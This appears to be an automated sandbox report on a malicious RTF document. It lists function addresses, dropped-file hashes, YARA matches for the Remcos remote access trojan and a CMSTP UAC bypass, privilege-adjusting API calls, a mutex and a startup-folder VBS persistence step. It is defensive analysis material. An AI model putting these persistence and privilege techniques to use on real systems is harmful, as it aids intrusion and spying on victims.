Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D26F36	5_2_00D26F36
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D070FE	5_2_00D070FE
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D03190	5_2_00D03190
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00CF1287	5_2_00CF1287
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D1F359	5_2_00D1F359
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0139E800	6_2_0139E800
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013B3307	6_2_013B3307
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013BDAF5	6_2_013BDAF5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0139FE40	6_2_0139FE40
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013A4140	6_2_013A4140
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_0139E060	6_2_0139E060
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013B2345	6_2_013B2345
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013C25AE	6_2_013C25AE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01410465	6_2_01410465
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013C6452	6_2_013C6452
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013B277A	6_2_013B277A
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013F8932	6_2_013F8932
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013EE928	6_2_013EE928
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013C890F	6_2_013C890F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013A8968	6_2_013A8968
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013C69C4	6_2_013C69C4
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013A6841	6_2_013A6841
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_014108E2	6_2_014108E2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013BCCA1	6_2_013BCCA1
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013C6F36	6_2_013C6F36
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013A3190	6_2_013A3190
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013A70FE	6_2_013A70FE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013BF359	6_2_013BF359
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01391287	6_2_01391287
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013B1604	6_2_013B1604
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013A5680	6_2_013A5680
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013B7813	6_2_013B7813
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013A58C0	6_2_013A58C0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013B1AF8	6_2_013B1AF8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013C9C35	6_2_013C9C35
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013BBF26	6_2_013BBF26
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013B1F10	6_2_013B1F10
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_01417E0D	6_2_01417E0D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_005E3620	6_2_005E3620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_3_0351ACC7	7_3_0351ACC7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_3_034EA2D7	7_3_034EA2D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_3_03549CCB	7_3_03549CCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043706A	7_2_0043706A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00414005	7_2_00414005
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043E11C	7_2_0043E11C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004541D9	7_2_004541D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004381E8	7_2_004381E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041F18B	7_2_0041F18B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00446270	7_2_00446270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043E34B	7_2_0043E34B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004533AB	7_2_004533AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0042742E	7_2_0042742E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00437566	7_2_00437566
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043E5A8	7_2_0043E5A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004387F0	7_2_004387F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043797E	7_2_0043797E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004339D7	7_2_004339D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044DA49	7_2_0044DA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00427AD7	7_2_00427AD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041DBF3	7_2_0041DBF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00427C40	7_2_00427C40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00437DB3	7_2_00437DB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00435EEB	7_2_00435EEB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043DEED	7_2_0043DEED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00426E9F	7_2_00426E9F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10017194	7_2_10017194
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_1000B5C1	7_2_1000B5C1

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\taskhostw[1].exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\directory\name.exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Roaming\taskhostw.exe D98FA625A92C790403EE5F8BE928948855EA23A892321CC7D219895D3F5B1C36

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 013B0C63 appears 70 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01397F41 appears 35 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 013B8A80 appears 42 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00434801 appears 41 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00401E65 appears 35 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 00434E70 appears 54 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: String function: 02A88FF8 appears 32 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: String function: 02A88E20 appears 32 times
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: String function: 02AA7E80 appears 42 times

Source: WC5Gv13cOQ.rtf, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.name.exe.d70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 6.2.name.exe.d70000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.name.exe.28e0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 13.2.name.exe.28e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000E.00000002.394468723.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000007.00000002.854880979.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000006.00000002.365614526.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.394764051.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: Process Memory Space: name.exe PID: 3580, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3592, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: name.exe PID: 3856, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 3892, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: bhv41C2.tmp.9.dr

Binary or memory string: org.slneighbors

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winRTF@20/22@1/3

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D5A0F4 GetLastError,FormatMessageW,

5_2_00D5A0F4

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D484F3 AdjustTokenPrivileges,CloseHandle,	5_2_00D484F3
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D48AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	5_2_00D48AA3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013E84F3 AdjustTokenPrivileges,CloseHandle,	6_2_013E84F3
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013E8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	6_2_013E8AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	7_2_0041798D

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D5B3BF SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

5_2_00D5B3BF

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D6EF21 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

5_2_00D6EF21

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D684D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

5_2_00D684D0

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00CF4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

5_2_00CF4FE9

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

7_2_0041AADB

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$5Gv13cOQ.rtf

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-FI789R

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR7879.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"

Source: C:\Windows\SysWOW64\svchost.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

